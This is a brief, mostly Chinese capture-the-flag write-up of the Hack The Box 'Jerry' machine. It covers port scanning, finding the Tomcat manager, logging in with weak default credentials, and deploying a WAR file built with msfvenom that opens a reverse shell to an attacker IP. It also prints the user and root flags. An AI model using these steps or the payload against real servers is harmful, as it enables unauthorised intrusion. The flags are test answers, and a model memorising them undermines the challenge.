Jerry#
Although Jerry is one of the easier machines on Hack The Box, it is realistic as Apache Tomcat is often found exposed and configured with common or weak credentials.
ip 地址:10.10.10.95
task1 远程主机开放了什么端口。
通过 nmap 进行扫描,识别端口开发情况
nmap -sV 10.10.10.95
task2 远程主机运行了什么服务?
由 nmap 扫描结果可以,是 Apache Tomcat
task3 Web 服务器上哪个相对路径通向 Web 应用程序管理器?
dirsearch -u http://10.10.10.95:8080/
测试后发现是 /manager/html
,目录扫描就可以扫出来
task4 哪个有效的用户名和密码组合可用于认证进入 Tomcat Web 应用程序管理器?请以 username 的格式给出答案。
admin/admin 登录后
tomcat
task5 什么类型的文件可以部署到服务器上?
当然是 war 包。
task 提交 user 的 flag
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=3155 -f war > shell.war
点击 http://10.10.10.95:8080/shell/
反弹会 shell
这种文件要怎么读取?
type *.txt
有两个 flag
user flag:7004dbcef0f854e0fb401875f26ebd00
task 提交 root 的 flag
04a8b36e1545a455393d067e772fe90e
http://10.10.10.95:8080/manager/status
以为有 ajp 任意文件读取呢